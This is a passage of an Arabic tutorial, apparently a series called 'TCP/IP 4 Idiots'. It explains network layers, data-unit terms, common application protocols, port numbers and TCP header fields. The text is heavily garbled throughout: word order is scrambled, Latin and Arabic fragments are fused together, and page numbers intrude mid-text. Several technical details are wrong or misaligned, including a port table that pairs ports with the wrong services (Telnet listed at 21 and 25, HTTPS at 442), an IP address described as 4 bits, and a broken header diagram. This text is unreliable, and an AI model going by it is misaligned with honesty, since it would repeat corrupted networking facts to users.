ومع ذلك ھناك Routingبر بروتوكوالت التوجیه عادة بروتوكول ھذه الطبقة تعت : من بروتوكوالت التوجیه . بروتوكوالت اخري في ھذه الطبقة

IP/Internet Protocol و BGP/Border Gateway Protocol،Open Shortest Path OSPF/First ،Automatic Route , RIP/Routing Information Protocol

discovery subsets IP Protocolof the

Logical Addressesالعناوين المنطقیة العنوان المنطقي عنوان تعطي لبطاقة واجھة الشبكة، وبذلك يتمكن مدير

. الشبكة من معرف الشبكة التي ينتمي الیھا حاسوب ماالتي تملك عنوان بروتوكول طبقة ( ويسمح أيضا بتوفیر مضیف متعدد العناوين

. العمل بجسر للشبكة التي بامكانه) الشبكة

Data Link Layer: طبقة ربط البیانات وظیفة ھذه الطبقة تقديم سبیل موثوق من اجل نقل البیانات في الشبكة،

وھذا الطبقة . ويستخدم عنونة فیزيائیة من ترحیل البیانات الي العالم الخارجي .ايضا تستیطع تعريف طوبولوجیا الشبكة

تكون من طبقتین فرعییتن في الحقیقة ھذه الطبقة ت

46

The LLC Sublayerالطبقة الفرعیة

تدير اكثر من اتصاالت في وصلة شبكة LLCطبقة التحكم في الربط المنطقي والمواصفات تدعم االتصال 2802IEEE.والمواصفات تم تحديدھا في . وحیدة

connectionless and connection oriented services.

The MAC Sublayerالطبقة الفرعیة ( طبقة التحكم في الوصول تدير في وصول البروتوكول الي وسیط فیزيائي

التي تعرف MAC تعرف عناوين IEEE MACمواصفات . مثل كبل ايثرنت ) العتاد .بالعنوان الفیزيائي والتي تمكن اكثر من جھاز في ھذه الطبقة ؟

Physical Addressesالعناوين الفیزيائیة

ن الفیزيائي ھو عنوان موجود في بطاقات مثل بطاقة ايثرنت، ويشبه الرقم العنواواول ثالث بايتات تستخدم . بتات ويمثل بالستعشري 6وھو بطول .التسلسلي

وھذه البايتات الثالث تدمج مع البايتات الباقیة . للتعريف علي منتج البطاقة NICبطاقة واجھة الشبكة واذا نظرت في . وتنتج منھا رقم معرف فريد للبطاقة

واذا كان ھذا المیزة غیر . 133F 4A 0B3 FF Aسوف تري رقما مثل ھذه موجودة في البطاقة، فالطريقة الوحیدة من اجل توجیه البیانات عبر الشبكات

. فريدة SPX/IPX او IP/TCPھو اعطاء كل جھاز عنوانا

The Physical Layerالطبقة الفیزيائیة مسئولة عن الحصول علي تدفق البتات ووضعھا في الطريق في ھذه الطبقة

. العتاد الشبكي

، والشبكة Link-Data، ربط المعلومات Physicalوالطبقات الفیزيائیة Networking كل ھذه الطبقة لیست خاصة بالشبكة من نوع LAN بل توجد في

. ايضاWANالشبكات واسعة النطاق

= ھا وطبقاتIP/TCPمجموعة = تشمل كل مكونات الشبكة ولیست ( وأقسامھا OSI/ISOتكلمنا عن طبقات اي طبقات IP/TCP، واآلن نتكلم عن الطبقات الخاصة بعائلة ) البروتوكوالت فقط

....البروتوكوالت بحد ذاتھا تم تطويرھا في شكل طبقات كل طبقة IP/TCPمجموعة بروتوكوالت

47

وكل طبقة تضم المزيج من .. االتصال ككلمسؤولة عن جزء معین في عملیة وھي اربع طبقات كما يلي.. البروكوالت في ھذه المجموعة

LPD SNMP TFTP SNMP Xwindow , mail-e, FTP, Application Layer Telnet

etc. UDP, Transport Layer TCP/Host to Host

RARP,ARP, IGMP, 792ICMP RFC, 791Internet Layer IP RFC –894 RFC, twork Access Layer device driver and interface cardNe

Fast/ Ethernet FDDI,Token Ring, Ethernet

IP Suit Model OSI Reference Model/TCP-DoD

طبقة التطبیقات طبقة المعالجة والتطبیقات طبقة التمثیل

طبقة الجلسة

المضیف طبقة النقل - المضیف

طبقة الشبكة االنترنت

الوصول الي الشبكة طبقة وصل البیانات الطبقة الفیزيائیة

... تضم طبقات زائدة ال تدخل في ضمن البروتوكوالت OSIنالحظ ان

ولیست (يمكننا تقسیم البروتوكوالت حسب وظیفتھا الى ثالث أقسام

: )الطبقات . Application Protocols بروتوكوالت تطبیقات - 1 . Transport Protocols بروتوكوالت نقل - 2 . Network Protocols بروتوكوالت شبكة - 3

و تتلخص Protocol Stackتعمل بروتوكوالت التطبیقات في الطبقات العلیا من

48

: مھمتھا في تبادل البیانات و تحقیق التفاعل بین التطبیقات و من أمثلتھا)SMB(Server Message Block )NCPs( NetWare Core Protocols s'Novell )FTAMP(File Transfer Access and Management Protocol

: و من بروتوكوالت التطبیقات الخاصة باإلنترنت )FTP(File Transfer Protocol

Telnet

أما بروتوكوالت النقل فتستخدم لتوفیر جلسات اإلتصال بین الكمبیوترات على ة عن صیانة جودة و دقة المعلومات المنقولة بین الشبكة و ھي مسئول : األجھزة، و من أمثلتھا

. NWLinkالجزء الناقل من بروتوكول میكروسوفت NetBEUIالجزء الناقل من بروتوكول

)SPX(Sequenced Packet Exchange )TCP(Transmission Control Protocol

و تتلخص مھامھا بما nk ServicesLiبینما تقدم بروتوكوالت الشبكة خدمات ربط : يلي

. Routing/Adressing عنونة و توجیه المعلومات -1 . Error checking البحث عن إخطاء في عملیة اإلرسال -2 . التعامل مع طلبات إعادة اإلرسال -3 Token تحديد قوانین اإلتصال في بیئات محددة من الشبكات مثل إثرنت و -4

Ring . : لة على ھذه البروتوكوالتما يليمن األمث

)IP(Internet Protocol )IPX(Internet work Packet Exchange

وكل طبقة لديھا عمل معین او طبقة Link Layer-Dara طبقة الوصل واحیانا تدعي طبقة ربط البیانات - 1

device تشمل عادة المشغل Network Interface Layerواجھة الشبكات rdriveواالثنین . في نظام التشغیل وتقابل بطاقة واجھة الشبكة في الحاسوب

) ...االسالك الخ ( معا تعالج كل ما تتطلب التعامل مع العتاد والوسائط

49

تعالج حركة الرزمة مسیرتھا Internet layer طبقة الشبكات تدعي احیانا - 2 في الشبكة مثل توجیه الرزم، وبروتوكوالت مثل

Internet Message Control Protocol/ICMP, net ProtocolInter/IP, Internet Group Management Protocol/IGMP تخدم في ھذه الطبقة مثال ...

بین الطرفین وتقدمھا Flow of data طبقة النقل تقوم بمعالجة سیر البیانات - 3

توكول النقل وفي الحقیقة ھناك نوعان من برو.. لطبقة التطبیقات التي فوقھا TCP و UDP.

الخsmtp,ftp,telnetمثل ... طبقة التطبیقات تقوم بمعالجة تفاصیل البرامج - 4

50

TCP/IP 4 Idiotsجزء الثاني


TCP/IP تكملة لطبقات البروتوكوالت

حسب عملھا إلي أربع طبقات ونصیر علـي ھـذا IP/ TCPكما قلنا سابقا نقسم ..ونتكلم عن كل طبقة علي حدة وبشيء من التفصیل .... فیما يلي التقسیم

كان من المفروض ان يكون ھذا المقال شرحا شامال للطبقات االربع ولكن بـض ( القراء طلبو تقسیم المقال الي جزئیات صغیرة ووولـذلك تـم تقـسیمه الـي عـدة

) :D إلي أجل آخر Subnettingاجزاء وتم تأخیر موضوع

وين المنطقي ألبسط عقدة في الشبكة كما يليالتك

----------------------------

|network applications |

| |

|/ ... | \/ .. | \... |

|----- -----|

| |UDP| |TCP| |

|----- -----|

| / \|

|--------|

51

| |IP | |

|------*- -----|

| | |ARP| |

| |-----|

| |\|

|------|

| |ENET| |

|--@---|

-----------------|----------

|

---------o----------------------

Ethernet Cable كبل ايثرنت

IP/TCP عقدة مبسطة لشبكة – 1الصورة

... ھذا تكوين منطقي لعقدة أو جھاز في الشبكة تعتمد علي معمارية الطبقـات المربعات تمثـل مرحلـة معالجـة ... والتي تحدد سلوك ھذا الجھاز علي اإلنترنت

إلـي والخطـوط توصـل المربعـات ترينـا الطريـق التـي تـسلكه البیانـات ,, البیانات ..األمام

Transceiver ..تمثل الـ Oأما الخط األفقي في األسفل فتمثل كبل ايثرنت،، و Ethernet تمثل عنوان@ و IP تمثل عنوان* و النجمة

52

والمصطلحات بنیة وحدة بیانات المرسلة== =

The formation of a transmitted unit of information

حتـى الطبقـة األخیـرة OSI قة إلي أخرى فـي نمـوذج رزم البیانات تنتقل من طبوفـي كـل طبقـة . تتعرض للتغییر، وھي إضافة ترويسات والتـذيیالت إلـي الـرزم

: تسمي وحدة البیانات بأسماء مختلفة

الطبقة اسم الطبقة اسم وحدة البیانات

ata user dمعلومات المستخدم /بیانات التطبیقات 7

dataبیانات التمثیل 6

dataبیانات الجلسة 5

segmentمقطع النقل 4

packetرزمة الشبكة 3

frameإطار ربط البیانات 2

bit steam قناة بتات/بتات الفیزيائیة 1

Packetرزمة

Datagramجزئیة بیانات

Segmentمطقع

Streamتیار

Frameإطار

wdata floسريان البیانات

53

Messageرسالة

وھنا بعض المصطلحات األخرى بالتفصیل

رزمة المتواجدة في طبقة الـشبكات التـي تـستخدم Datagram :جزئیة بیانات .خدمات الشبكة من نوع االتصال الحقیقي

تسمیة أخرى للبیانات المتواجدة فوق طبقة الشبكة، وأيضا Message :الرسالة .ح تطلق علي البیانات في طبقة التطبیقات ھذه االصطال

وبطول Link - Dataوحدة بیانات التي تتواجد في طبقة ربط البیانات Cell :الخلیة ).بت ATM ) 53مثل WAN متغیر، واغلب األحیان توجد في شبكات من نوع

. اصطالح عام للبیانات في أي طبقة كان : data unit وحدة بیانات

برنامج تقوم باالتصال مباشرة مع كرت واجھة الـشبكة مثـل Driver :المشغل.Ethernet

برنـامج تقـوم باالتـصال مـع المـشغل، أو تطبیقـات الـشبكة Moduleوالنمـوذج Network Application أو مع نموذج آخر..

عدة اسماء مختلفة تبعا لموقعھا في مكـدس dataفكما نري تاخذ وحدة بیانات IP/TCP

طبقة ايثرنت تدعي إطار ايثرنت، واذا كان بـین طبقـة ايثرنـت ونمـوذج ايبـي في تــدعي جزئیــة بیانــات UDPونمــوذج IP ، واذا كــان بــین نمــوذجIPتــدعي رزمــة

datagram واذا كان بین نموذج ، IP ونمـوذجTCP تـدعي مطقـع TCP واذا كـان ، في طبقة تطبیقات الشبكة

54

للمزيد حول ھذه االسـماء يمكنـك ...geApplicatio Messaتدعي رسالة تطبیق 1122RFCمراجعة الوثیقة المعنونة

...نظرة إلي تكوين عقدة في الشبكة من زاوية البروتوكوالت====

مسار البیانات في المكدس ===

واآلن دعنا نتبع البیانات مـسارھا فـي المكـدس كمـا ھـي فـي الـصورة األولـى، مرر البیانات من طبقة التطبیقـات إلـي نمـوذج ت TCP البرنامج التي تعتمد علي

TCPأما البرنامج التي تعتمد علي ، UDP تمررھا علي نموذج UDP.. برامج FTP ، والمكـدس فـي حالتھـا تكـون TCP تعتبر مثال علي البرامج التي تعتمـد علـي

Ethernet/IP/TCP/FTP أماSNMP مثال تعتبر مثاال علي البـرامج المعتمـدة علـي UDPمكدس في حالتھا تكون والEthernet/IP/UDP/SNMP

1 2 3 ... n 1 2 3 ... n

\ | / | \ | | / ^

\ | | / | \ | | / |

------------- flow ---------------- flow

|multiplexer| of |de-multiplexer| of

------------- data ---------------- data

| | | |

| v | |

55

1 1

المازجات والموزعات : الصورة الثانیة

n-to-1 multiplexer and 1-to-n de-multiplexer

تعتبـر Ethernet ومـشغل UDP ونمـوذج TCP كمـا فـي الـصورةا الثانیـة نمـوذج Multiplexerمازجات to - N –1) أي تضع عدة قنـوات فـي قنـاة واحـدة مـن اجـل

) .... إرسالھا إلي الخارج

أي تــوزع ( فــي نفــس الوقــت n- to- 1 أيــضا Multiplexer-Deتبــر موزعــات وتع )البیانات الواردة في قناة واحدة إلي عدة قنوات

ــت : واآلن ــا ســتكون ايثرن ــاك بیانــات واردة،، أول محطتھ ــل أن ھن وھنــا ( فلنقومشغل ايثرنت تقوم بتمريرھا إلي األعلى ، أما ) Ethernet Frame تسمي إطار

Type حقـل النـوع فـي IP حل العناوين أو نموذج بروتوكولARP ج بروتوكولنموذ IP أو ARP في إطار ايثرنت تحدد فیما إذا كانت تمررالي

تقوم بـدورھا بتمريـر البیانـات إلـي IP، وIP فلنقل أن البیانات مررت إلي نموذج لـرزم IP فـي ترويـسة Protocol حـسبما تخبرھـا حقـل UDP أو TCP األعلـى ..البیانات

Application ،، وتـسمي ھنـا UDP فلنقـل أنھـا أي البیانـات مـررت إلـى نمـوذج Message وبدورھا تمرر إلي تطبیق الشبكة حسبما تخبرھا حقـل المنفـذ Port

...في ترويسة الرزمة

56

Port بنفس الشكل تمرر إلى تطبیق الشبكة حسب حقـل TCP وإذا مررت إلى TCP ..في ترويسة

مـزج بیانـات القنـوات القادمـة مـن اعلـي الطبقـة إلـي الطبقـات ( لمـزج عملیة ا نھايـة /بروتوكـول تقـوم بإضـافة ترويـسة / فكـل نمـوذج .. سھلة نسبا ) السفلي

...وبذلك يمكن توزيعھا في الطرف اآلخر .. خاصة بھا إلى رزمة البیانات

إلـى UDP / TCPالبیانات القادمة مـن بـرامج تطبیقـات الـشبكة تمـرر سـواء إلـى مثـل Network Interface Driver وأخیرا الطبقة الفیزيائیة IP األسفل ، فنموذج

..Ethernet

وغني عن الذكر، أن تقنیة إنترنت تدعم أنواع عتاد مختلفة للشبكات،، وااليثرنت ...تعتبر اكثر شیوعا في الشبكات الفیزيائیة

وبـذلك لـديھا .... يثرنـت واحـدة اتـصال ا / الجھاز في صورة رقـم بـــ لـديھا واجھـة منھـا 24... بتـات 48 بايتـات، اي 6مكونـة مـن MAC Address عنـوان ايثرنـت أو

..رقم تعريف خاص للشركة المنتجة

ھـذا العنـوان .. بتات كما ذكرنا أعـاله 4مكونة من IP ونفس الجھاز لديھا عنوان ز في االنترنت عنوانوتكون لكل جھا ،IP تتواجد في المكدس في اسفل نموذج

IP وحید.

أو IP والجھــاز المتــصل باالنترنــت دائمــا تعــرف عنوانھــا الخــاص ســواء عنــوان ...Ethernet

... )الحظ أننا نتكلم عن جھاز متصل بشبكة أي عن عقدة ما في الشبكة (

....واآلن نأخذ شكال آخر للجھاز

ما يلي المكدسالجھاز إذا كان متصال إلى بطاقتین ايثرنت ستكون ك

57

----------------------------

|network applications |

| |

|/ ... | \/ .. | \... |

|----- -----|

| |UDP| |TCP| |

|----- -----|

| / \|

|-------- |

| |IP | |

|----- -*----*- -----|

| |ARP| | | |ARP| |

|----- | | -----|

|/ | | \|

|------ ------|

| |ENET| |ENET| |

|--@--- --@---|

---------|-------|----------

| |

58

---------------------------o---|

2Ethernet Cable |

----------o---------------

1Ethernet Cable

بطاقة ايثرنت2عقدة شبكة مع : الصورةالثالثة

وبـذلك تـصبح ... أي بطاقتین ايثرنت .. الحظ أن ھذا الجھاز لديه واجھتین شبكة Ethernet ..وزوجا من عنوان IP لديھا زوجا من عنوان

n - to - m وموزع المزج m - to -n تعتبر مازج IP وفي ھذه الحالة نموذج

1 2 3 ... n 1 2 3 ... n

\ | | / | \ | | / ^

\ | | / | \ | | / |

------------- flow ---------------- flow

|multiplexer| of |de-multiplexer| of

------------- data ---------------- data

/ | | \ | / | | \ |

/ | | \ v / | | \ |

1 2 3 ... m 1 2 3 ... m

: المازجات والموزعات المتعددة : الصورة الرابعة

59

n-to-m multiplexer and m-to-n de-multiplexer

TCP UDP

/\

/\

--------------

|IP |

| |

|---|

|\/ |

|v / |

--------------

\/

\/

data data

60

comes in goes out

here here

IPتمرر رزمة : الصورةالخامسة

Example of IP Forwarding a IP Packet

، ding Forwarإلـى شـبكة خارجیـة تـسمي تمريـر، IP وعملیـة إرسـال رزم Router - IPوالجھاز الخاص لعملیة التمرير ھذه تسمي الموجه

UDP أو TCP كما تري من الصورة أعاله أن توجیه رزم ال عالقة لھا ھنا بنماذج

... الن بعض تصمیمات الموجھات ال تحتوي علي تلك النموذجین

=== IP تصمم شبكة منطقیة وحیدة..

فكل نموذج أو المشغل تضیف إلى.. اح تقنیة اإلنترنت تعتبر مفتاح نج IP نموذجMessage ترويساتھا كما ذكرنا حتى تـصل إلـي النمـوذج أو الطبقـة الـسفلي ..

وفي المقابل تقوم كل نموذج أو الطبقة في الطرف اآلخـر تقـوم بعـزل الترويـسة خـام Message الخاصة بھا حتى تصل إلي الطبقة العلیا كما أرسلت في شكل

. ..

التـي تكـون شـبكة منطقیـة وحیـدة مـن شـبكات IP تحمـل عنـوان IP ترويـسة يعنـي .Internet وتشبیك ھذه الشبكات الفیزيائیة ھي مصدر. فیزيائیة متعددة

مجموعة مـن الـشبكات الفیزيائیـة متـصلة ومتـشابكة ببعـضھا وتـسمي إنترنـت .وتشكلھا

61

Idiots 4 IP /TCPالجزء الثالث

AcKAlj.SaD:للكاتب

Network application Layerطبقة التطبیقات : IP/TCPالطبقةاالولي لـ استخدم الموقع RFC من اجل وثائق -مالحظة (

rfcs/org.faqs.www://http(/ 1 - Archie : برنامج يمكن المستخدم من البحث في مزودات

FTP عن ملفات وقد حل محلھا تدريجیا WWW للمزيد ، articals=show?/com.bytes-angels.www://http&info=action&4=id

2 - BGP Border Gateway Protocol بروتوكول غالبا يستخدم

من اجل الربط، وبما يعني ان االنترنت نفسھا تتم الربط بین كبريات ISPبین شبكاتھا

.بھذا البروتوكول

Classfull تعتبر التيRIP عكس Classless Routing Protocolوتندرج تحت

)االصدار االخیر للبروتوكول ( 1771RFCللمزيد راجع 3 - Domain Name Server DNS : ،بروتوكول تحويل النطاق

تقوم بتحويل اسماء نطاق الي عناوين ايبي Nsloopupمن اشھر برامجه للمزيد .. والعكس

62

etc,1035 ,920,883,882799RFCراجع الوثیقة 4 - rFinge تستخدم من اجل الحصول علي معلومات حول

مضیف ما في الشبكة، من المفضل دائما تعطیل ھذه الخدمة من /مستخدم اجل دواعي االمنیة

.1288RFC بروتوكول File Transfer Protocol، اختصار FTP تطبیق - 5

، FTPو وفقا لبروتوكول TCP مثل تلنت تعمل عبر FTPنقل الملفات، وتطبیق والعملیة تشبه

عملیة الوجول للمزود عبر تلنت ولكنك ھنا تقوم بالتصفح عبر الفھارس والملفات وتمكنك

959RFCراجع الوثیقة رقم . من نقل الملفات بین االجھزة 6 - HTTP Hypertext Transfer Protocol بروتوكول نقل

في شبكة TMLHالنص المتشعب ھو البروتوكول المعتمد لنقل النصوص بھیئة يحتوي . ويب

، تستخدمھا Put و Get على أوامر عالیة المستوى، مثل HTTPبروتوكول browsersالمتصفات

لطلب صفحة ذات ھیئة Getويستخدم األمر . في التواصل مع مزودات ويبHTML أو صورة ، راجع . ، أو أية بیانات أخرى من مزود ويب، لعرضھا على الشاشةGIF.بھیئة

ثیقة رقم الو1945RFC

7 - Messeg Access Protocol/IMAP The internet Mail

POPتستخدم ھذه البروتوكول من قبل برامج البريد االلكتروني كبديل ل وكواجھة بین

.... المستخدم ومزود البريد وتعمل علي جلب وادارة صندوق البريد بشكل مرن راجع

63

17311730RFC,الوثیقة 8 - The Packet Internet GroperPing أحد تطبیقات

IP/TCP يستخدم لكشف ما إذا كان كمبیوتر معین متصال بالشبكة وجاھزا ، . لالتصال به

ICMP echo requestويتم كشف حالة كمبیوتر ما، بإرسال إشارة إرجاع الصدى وانتظار

792RFCراجع . الرد 9 - POP بروتوكول مكتب البريدce ProtocolPost Offi

بروتوكول لنقل النصوص، يستخدم إلرسال واستخراج رسائل البريد اإللكتروني ضمن شبكة

، الذي يستخدم لنقل رسائل البريد بین النظم SMTPوخالفا لبروتوكول . إنترنت المزودة،

وسیلة لتفاعل برامج البريد مع صناديق البريد االفتراضیة، POPيوفر بروتوكول التي يتوفر بروتوكول . فظ بالرسائل إلى حین استخراجھا أو إرسالھا إلى وجھاتھاتحت

POP تحت والتشابھة بین ھذين البروتوكول ھو في االسم فقط، . 3POP و 2POPاسمین

وھما غیر 1460RFCراجع الوثیقة رقم .. متوافقین على اإلطالق

:Telecommunication Network اختصار Telnet تطبیق - 10 telnet والبروتوكول المسمي TCPتقدم تلنت خدمة الولوج عن بعد عبر

protocol وتعتبر خادم /من اقدم التطبیقات الشبكة، وعندما يقوم احد بالولوج عبر تلنت الي مزود

بعید وتطبیقات تلنت ...كلما يكتبه من اوامر تنفذ في ذاك المزود ولیس في جھازه

متوفرة في راجع ... وال اعتبار لنظام التشغیل التي يعمل علیھا المزودكل نظم التشغیل

الوثیقة

64

854RFCراجع الوثیقة

11 - SSH Secure Shell Protocol يستخدم من قبل برامج لالتصال بمضیف بعید عبر انترنت مثل تلنت ولكن يستخدم التشفیر في عملیة

تبادل كلمة .السر والبیانات

للمزيد راجع.. Putty, cureCRTSeمن اشھر برامجھا

RFC/ssh/help/edu.ufl.cise.www://http

12 - SMTP البروتوكول البسیط لنقل البريد Simple Mail Transfer Protocol بروتوكول من مجموعة IP/TCP يستخدم لنقل النصوص ،

أثناء تبادل بروتوكول يحدد . MTPوھو نسخة مبسطة عن بروتوكول . الرسائل عبر إنترنت

SMTP ھیئة 822821RFC,راجع الوثیقة رقم .وطريقة تبادل البیانات بین مزودات البريد

13 - SNMP Simple Network Management Protocol برتوكول وصممت من اجل ادارة وفحص احوال الشبكات UDPادارة الشبكة تعمل عبر

وبھا يستطیع مدير راجع الوثیق .. االصدار االول والثاني الشبكة اكتشاف مشاكل الشبكة قدم

,14411157RFC

بروتوكول معقد نوعا ما ... االصدار الثاني اضافت طرقا اكثر امانا الدارة الشبكات ،

تتحدث عن 2570RFC و1157RFCراجع الوثیقة ... ونشرت كتب خصیصا لھا االصدار الثالث

...

65

htm.rfc_snmp/tpc4snmp/org.wtcs.www://http

14 - SSL Secure Sockets Layer طبقة مقبس آمن صممت من قبل نتسكیب

تقدم آلیة عمل من اجل اتصال آمن عبر االنترنت، اعتمدت علي التوثیق و طريقة تشفیر مفتاح

Publicالعام Keyوتوكول ھو من اشھر برامج تستخدم ھذا البرHTTP عبر SSL ) اغلب

المتصفحات يدعم فقط، بروتوكوالت اخري HTTPولكنه لیس خاصا ب)ھذا البروتوكول ھذه االيام

مثل 3POP,Telnet,FTP,4IMAP االصدار الجديد من ھذا البروتوكول تم . ايضا تدعمه

تسمیته Transport Layer Security TLS 2246 راجع الوثیقة رقمRFC.

15 - TFTP The Trivial File Transfer Protocol برتوكول ، .1350RFCراجع الوثیقة ... من اجل نقل الملفات، وأقل أمنا FTPمبسط من

16 - TraceRoute من أشھر تطبیقات وبرامج مھمة في عالم الشبكة، صممت أصال من اجل اكتشاف حالة مزودما او طريقة ما بین جھازين

يظھر ... متوفر في أغلب . الطريق التي سلكه رزمة ما ارسلت من جھاز الي جھاز آخر

نظم التشغیل 1393RFC.Live TTL -To-Timeتقنیا تعتمد علي حقل ...

17 - Whois برنامج مفید مثل تبحث في قواعد بیانات DNS اسماء، عناوين وارقام تلیفونات( وغیرھا من اجل معلومات عن عناوين النطاق

لالتصال ).وما الي ذلك

com.arin.www

66

whois/net.ripe.www للمزيد راجع الوثیقة ، 954RFCرقم

18 - NFS اختصار Network File System نظام ملف الشبكة ، تمكنك من الوصول الي االقراص UDP وتعمل عبر Sunطورت من قبل شركة

في شبكات بعیدة 3010RFC، راجع الوثیقة 4ي الخ آخر اصداره وكانھا جزء من الجھازالمحل

ھذا لیس حصرا لبرامج ھذه الطبقة وانما جزء منھا

67

Idiots 4 IP/TCPالجزء الرابع


:المنفذ

بعیدعلیك ان تحدد رقم المنفذ التى /آخر عندما وتنشئ اتصاال او ربطا مع جھازوھذه المنفذ لیست محسوسة كمنافذ . ا ترسل وتستقبل البیانات من خاللھ

2COM, 1 COM ولكنھا مجرد منفذ افتراضي وفائدة المنفذ حتى ال تضل البیانات طريقھا، مثال بدون المنفذ ماذا لو ذھب البیانات التى ترسلھا الى مزود ويب

؟ FTPاو Telnetالى مزود آخر مثل

روتوكول لھا منفذ خاص حتى ال يحدث ھذا تستخدم المنافذ حیث كل خدمة او ب تستخدم منفذ رقم HTTP الستقبال البیانات و 21 تستخدم منفذ Telnetمثال … لتعامل مع العمیل الخ الخ 80

... منفذ متوفرة 65535 بت حوالي اي 16المنافذ عبارة عن ارقام من

تدعي المنافذ المعرفة مسبقا، مرتبطة 1023 حتي 0المنافذ من وفي نظم FTP,HTPPخدمات معروفة مثل /دم ببروتوكوالتمزودات تق/لتطبیقات

root ,(تشغیل متعدد البیئة مقیدة استخدامھا برخصة من مدير النظام Administrator. (

تدعي المنافذ المسجلة، وتقع في في ھذا 65535 حتي 1034األرقام من اتھم ، القسم ارقام تعارف علیھا مجتمع االنترنت الستخدامھا بحرية في تطبیق

بالنسبة ( كال من تطبیقات مزود او الزبون بامكانھا اختیار رقم من ھذا القسم للمزود يستخدم منفذه الخاص المحددة، اما تطبیق زبون من الممكن اختیار أي

) .رقم عشوائي من ھذا القسم أو تحصل علیه من قبل نظام التشغیل

68

بعض ارقام المنافذ الشھیرة

البروتوكول/الخدمة وتوكول األساسيالبر المنفذ7 TCP echo 13 TCP daytime 20 TCP control -ftp 21 TCP data -ftp 25 TCP telnet 27 UDP time 43 TCP Whois 53 UDP /TCP dns 69 UDP tftp 70 TCP ghoper 79 TCP finger 80 TCP HTTP 110 TCP 3pop 137 UDP ns -netbios 138 TCP dgm -netbios 139 TCP ssn -netbios 143 TCP imap 179 TCP bgp 442 TCP ssl /http 520 UDP rip 1080 TCP socks 33434 UDP traceroute

والقائمة الكاملة للمنافذة توجد ھنا numbers-port/assignments/rgo.iana.www://http

69

وارقام المنافذ والخدمات المدعمة من قبل النظام توجد في ملف اسمه servicesفي بیئة لینكس في مجلد etc / وفي بیئة ويندوز ،windows\:c ،

etc\drivers\32system\winnt\:C توجد في k2Wوفي بیئات

rol ProtocolTCP Transmission Contبروتوكول التحكم بالنقل •

تقدم قناة اتصال تعتمد علي إنشاء اتصال اوال TCP793 RFCكما ھو مذكور في وبذلك تضمن وصول الرزم الي وجھتھا وفي ترتیبھا الصحیح في حالة تجزئتھا وتقوم كشف االخطاء وتصیحھا وتجمیعھا مرة اخري اذا كانت قد قسمت الي

.. رزمة صغیرة

موثوق /قات الشبكات التي تتطلب اتصال آمن من قبل تطبیTCPيستخدم TELNETو FTPوويضمن عدم ضیاع الرزم، وابرز االمثلة لذلك تطبیقات

و عرض CPU مقابل تلك الموثوقیة يتطلب مزيدا من قوية TCPإال ان ..وغیرھم .UDP وترويستھا أكثر تعقیدا من TCPالحزمة للشبكة ونموذج

في المكدس في جھاز الزبون TCPنموذج ،TCPعندما يبدأ تطبیق ما استخدامبینھم Virtual Circuiوالخادم يبدءان في التخاطب ويتم انشاء وصلةافتراضیة

تحمل معلومات عن كال منھم وھذه الوصالت االفتراضیة تعتبر االرسال فیھا ذو بمعني ان االرسال يتم في كال االتجاھین وفي نفس full deplexاتجاه ثنائي ... التلیفون الوقت مثل

2 1 0 3 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0

1 0 9 8 7

70

Destination Port | Source Port Sequence Number

Acknowledgment Number | F |S|R|P|A|U| | Data

|I | Y|S|S|C|R| rvedRese| Offset Window

| N|N|T|H|K|G| | Urgent | Checksum Pointer

Padding | nsOptio

....................Data

ھنا ال تعرف TCP الن segmentوحدة البیانات تسمي وفي ھذه الطبقةMessage ) تذكر الرزمة في طبقة التطبیقات تدعيMessage ( بل تقوم بارسل

أن يعرف TCP بايتات وتكوين ھذا القطعة، وعلي البیانات علي شكل مجموعةإلي اي عملیة اتصال تنتمي ھذه القطعة، ويسبقھا عملیة اضافة ترويسة

تضاف ) بايتات ( ، وھذه الترويسة مجموعة من حقول المعلومات TCخاصة ب وتسمي ترويسة رزمة .. وھي تظھر في الرسم أعاله .... إلي بداية كل قطع

TCP .. بايت تشكل حقول المعلومات، واھم ھذه الحقول 20ن من وھي تتكو الحقول التي تحمل عنوان الجھة االخري، ورقم النفذ، وعنوان المرسل والمنفذ

...ورقم التسلسل للرزمة

TCPوااليبي لیست .. بعد تقسیم البیانات يمررھا إلي طبقة االيبي مع وجھتھا بما قبلھا من القطع او بما بعدھا لديھا فكرة عما اذا كانت ھذه القطعة متصلة

...

: ونستعرض حقول ھذه الترويسة فیما يلي

تحتوي علي المنفذين في Destination Port, Source Portحقل = … المستخدمة في جھة تطبیقات المزود والزبون

71

الرقم التسلسلي تشیر الي ترتیب اول بايت في Sequence Numberحقل = والرقم ... Stream، تشیر الي ترتیبھا في مجموع تیار البیانات المقطع الحالي

التسلسي ال يكون حسبب عدد الرزم ولكن حسبب البیانات، مثال، اذا كان ، والرقم 0 بیات، ستكون الرقم التسلسي 500الرزمة االولي حجمھا

وھي تفید في اعادة تجمیع .. ھكذا دوالیك 500التسلسلي للرزمة الثانیة .. زم وتشكیلھا من جديد الي االصل الر

تستخدم من قبل المرسل Acknowledgment number حقل المصادقة= للتأكد من استالم البیانات ، فمن اجل التأكد ان ال القطعة وصلت الي ھدفھا

وھي تحمل في ،acknowledgementيجب علي المستقبل ارسال رسالة في ( لمستقبل في تیار البیانات رقم تسلسلي التي يتوقعھا ا نفس الوقتاما في حالة المرسل لم ) 500 بايت المستخدم يرسل رقم 500حالة تسلم

من المستقبل في وقت محدد يقوم Acknowledgementيستلم رسالة تاكید < > ) .بارسال المعلومات مرة اخري

… تشیر اول بايت تنتمي الي المعلومات data offsetحقل =

تحمل مجموعة من الرايات التي تتحكم في عملیة اتصال rol flagContحقل = TCP وھي تشمل :

== urgent pointer field Significant URG عندما يتم تحديد ھذه الراية ، تشیر الي ان المقطع الحالي يحمل بیانات مھمة تتطلب االولوية في المعالجة

..

== t ACKAcknowledgement Field Significan عندما يتم تحديد ھذه ، رقم Acknowledgment Numberالراية تشیر إلي ان القیمة التي في حقل

باستثناء اول رزمة في ) الرزم( صحیح، يتم تحديد ھذه الراية في كل المقاطع . عملیة انشاء االتصال

== Push function PSH تستخدم الجبار TCP في ارسال البیانات بال انتظار من البیانات bufferتحرير الذاكرة الوسیطة ( النتھاء المستقبل من معالجتھا

.. مفیدة عند ارسال كمیة بیانات قلیلة) .. السابقة والستقبال الجديد

== Reset Connection RST عندما يتم تحديد ھذه الراية تتم إنھاء االتصال .. فورا

72

== Synchronize Sequence Number SYN تھیئة في تحدد رقم تسلسل … بداية انشاء االتصال

== Finish FIN نتیجة النتھاء ( تشیر الي طلب انھاء االتصال بشكل طبیعي ) .. المھمة من االتصال

